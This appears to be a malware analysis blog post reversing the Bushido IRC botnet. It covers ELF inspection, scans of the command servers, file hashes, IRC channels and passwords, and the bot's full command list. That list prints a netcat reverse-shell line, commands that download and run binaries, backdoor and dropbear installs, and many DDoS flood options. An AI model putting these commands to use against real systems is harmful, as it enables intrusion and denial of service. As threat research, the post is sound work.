Reversing Bushido IOT botnet by ZullSec
Yet another Linux Botnet sample by the name of Bushido by a group called 0ffsecurity, but this time things are little interesting, the bad actor is not just interested in using compromised IOT device as DOS attack surface but also using compromised web servers. In this post, we will examine how a small infection shell script which leads to the unravelling of dozens of malware. Solving this case also uncovered the hacker group behind this malware.
Let’s get right onto it, the infection script basically downloaded the bunch of Linux binaries from the malicious server and runs it, these binaries are compiled for different platforms as you can see below.
In this post we will reverse only 64-bit ELF binary as the rest of the binary will have the same functionality.
These are all the samples which were discovered during the analysis.
|FILE HASH VALUE||FILE NAME||FUNCTION|
|eabee288c9605b29f75cd23204b643cfe4d175851b7d57c3d3d73703bd0f8ec8||ftp1.sh||download the malware samples via ftp and install it|
|2544f0299a5795bf12494e2cbe09701cb024b06a0b924c91de0d35efb955a5fe||pma.php||php botnet more on it in later section|
|18d6a4280adf67e2adf7a89aa11faa93a5ed6fc9d64b31063386d762b92b45d3||pma.pl||pearl botnet more on it in later section|
Let see the file information of the binary.
$ file ambvjcv9e0
Let’s check the file headers
readelf -h x64_ambvjcv9e0
Now the program Headers
$ readelf -l ambvjcv9e0
Nothing unusual as there is no dynamic section INTERP section and dynamic section is missing. Now lets check section headers
$ readelf -S ambvjcv9e0
The binary is not stripped and it’s self-contained as it is statically linked. Since the binary is not stripped there will be lots of debugging information, with readelf we can list all the symbols as shown below
$ readelf -s ambvjcv9e0
Since there were lots of symbols so as not to lengthen the post I have included only a small part of the section. Now let’s see all the symbols ending with “.c” that will give us an idea by the name program of the file.
$ readelf -s x64_ambvjcv9e0 | grep -F .c
Bushido-IRC.c interesting !. Next stings, this was the most interesting part of the analysis, you won’t even have to open the disassembler to understand what the malware does, strings will confess it all to you.
$ strings ambvjcv9e0
There were lots of strings, just by skimming through the strings you can make out the functionality of malware. But here is the summary of the interesting strings you will find:
- CNC server IP
- username and password used to brute force telnet service
- HTTP headers
- Browser user agent strings
- lots of racist comment and foul words.
- lots of IRC commands and strings
- malware usage help strings
- malware update bash command and other shell commands
- error handling message
- libc function names
- nmap scan commands and logging of the error.
- build file names
looking at the string you can make a reasonable judgment of what their malware does. But to Investigate the execution flow and how to malware connect to CNC we should dig further. Since we found the IP in the strings, we can do a simple port scan of the CNC server, this is where I found the malicious pearl and PHP code, more on it in the next section.
Once you see IP address inside binary its a natural instinct to do a simple port scan on the IP, so innocent nmap scan on the server and got the following results.
Server A (IP 220.127.116.11): this server was serving the malware
21/tcp open ftp
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| 1024 b3:ae:e9:79:22:65:37:15:13:66:c8:8f:0a:81:13:ec (DSA)
|_ 2048 32:e9:e2:9f:9b:ae:13:e6:99:7a:60:91:9c:38:30:8d (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.15 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open https?
445/tcp filtered microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
| users: 57
| servers: 1
| chans: 3
| lusers: 57
| lservers: 0
| server: irc.NulL
| version: Unreal18.104.22.168. irc.NulL
| source ident: nmap
| source host: 19A967F7.1F3B5440.6D396E3B.IP
|_ error: Closing Link: kksqfgqca[22.214.171.124] (Client has disconnected from ZullSec)
From the scan results couple of deductions that we can make are :
It is an IRC based CNC server(plus we found IRC command in the strings this confirms that assumption).
FTP is probability serving files: to investigating further I connected to the FTP with default credentials anonymous as username and password to gain access and it worked!
- Once you would have connected to that server you would have found the binaries which we saw earlier, wandering a little bit here and there you would have also stumble upon other file pma.php, pma.el(more on this in Malware functionality section) and other shell scripts which basically downloaded the binaries and runs it.
- There was another update file called 8UsA1.sh which as also doing the same but was connecting to a different IP address 126.96.36.199.
Server B (IP 188.8.131.52) - this server was found in 8UsA1.sh, so let’s do another innocent nmap port scan. Found nothing interesting on this server simple HTTP service, results were as shown below.
80/tcp open http
443/tcp open https
Running: Linux 2.6.X
OS details: Linux 2.6.18 - 2.6.22
From our earlier finding its reasonable assumption that this malware is an IRC botnet hosted on Server A. If you try to connect to the server using any IRC client you will find two channel on that IRC Server :
- #pma - this is the channel where infected web server malware PHP/pearl script joins. Since PHP/pearl code was not obfuscated it was very simple to read it.
- #zull - this channel is where the Linux binary malware joins the channel and waits for the command.
Once the malware is running it connect to IRC server with the following command NICK[ZULL|x86_64]ZM5z format of the command is NICK[
Since binary has the debugging symbols not stripped, you could read the disassembly code effortlessly. Based on that you can make the following claims:
- DDOS attack it main functionality of the malware. There were many types of DDOS attacks like ICMP flood, TCP, UDP based attacks.
- Malware Client can be enabled/disabled by the CNC(not sure why ?). Disabling is done by a password which is “FreakIsYourGod!!!”, the password can be found in the binary.
- Malware client can be updated fetching the updated binaries from the server, there is another update mechanism by which malware can download the source code and compile the binary and delete the source code.
- malware client can download, compile C files and deletes the source code. This feature was present in the same function as the previous feature but could be a switch to different execution flow by one variable.
- malware joins the #zull channel with password topkeka.
- It can hop to a different server when instructed by current CNC.
Digging further you will find an array of structure where the first field is a pointer to a string( which is the name of the functionality) and next field is a pointer to a function which is the execution of that functionality.
So far we understood that bad actor compromises IOT devices or web server and use them as the attack surface for DDOS. The command to the infected devices is given through IRC channels. The bad actor uses channel #zull to command the IoT devices and #pma to the command we servers. IOT devices are infected with binaries and the servers are infected with PHP or pearl script. Functionalities of both the malware are described in more detail in the next section.
Non-root/non-spoof DDoS commands commands :
<port, 0 for random> <packet size, 0 for random> : An advanced non spoof UDP flooder modified by Freak
Spoof/root commands :
: A UDP flooder
: An advanced syn flooder that will kill most network drivers
<flags/method> : A leet flooder coded by Freak, attacks 31 ports. Can set flags or attack method.
: An ICMP packet flooder that will crash most firewalls and use loads of CPU.
Other commands :
- RNDNICK : Randomizes the knights nick
: Changes the nick of the client
: Changes servers
- GETSPOOFS : Gets the current spoofing
: Changes spoofing to a subnet
- DISABLE : Disables all packeting from this client
- ENABLE : Enables all packeting from this client
- KILL : Kills the knight
: Downloads a file off the web and saves it onto the hd
src:bin : Update this bot
: HackPkg is here! Install a bin, using http, no depends!
- VERSION : Requests version of client
- KILLALL : Kills all current packeting
- HELP : Displays this
: Sends this command to the server
: Executes a command
: SH, interactive, sends to channel
: Executes a psuedo-daemonized command
: Get a proper busybox
- INSTALL <http server/file_name> : Download & install a binary to /var/bin
: Execute commands using bash.
- BINUPDATE http:server/package : Update a binary in /var/bin via wget
: Call the nmap wrapper script and scan with your opts.
: Equates to nohup nc ip port -e /bin/sh
- LOCKUP http:server : Kill telnet, d/l aes backdoor from
, run that instead.
- GETSSH http:server/dropbearmulti : D/l, install, configure and start dropbear on port 30022.
- mail [to] [from] [subject] [message]
- dns [host]
- raw [irc] [data]
- eval [php] [code]
- exec [command] [args]
- cmd [command] [args]
- udpflood [ip] [port] [time] [packet] [size]
- tcpconn [host] [port] [time]
- slowread [host] [port] [page] [sockets] [time]
- slowloris [host] [time]
- l7 method [host] [time]
- post [host] time
- head [host] [time]
- tcpflood [host] [port] [time]
- httpflood [host] [port] [time] [method] [url]
- proxyhttpflood [targetUrl(with http://)] [proxyListUrl] [time] [method]
- cloudflareflood [host] [port] [time] [method] [url] [postFields]
- ud.server [host] [port] [pass] [chan]
this functionality resembles the earlier functionality which we saw in binary function.
Once you are connected to the IRC server you will have seen the following information on the channel.
I tried to search for these name which we see in above image on twitter and these are the accounts I found on twitter :
I couldn’t find other accounts, these people belong to a group called 0ffsecurity. My guess is they are trying to sell this botnet as a service. As doing a little google search you will find the following accounts.
These are the account for the Botnet product:
This malware is not new in this space and I am quite sure that these people have borrowed lots of code from the Mirai and made it into a new DDOS tool. They are also using the compromised web server as a DDOS attacking agent, and they are using IRC server as common CNC server to control both infected web server and IOT device.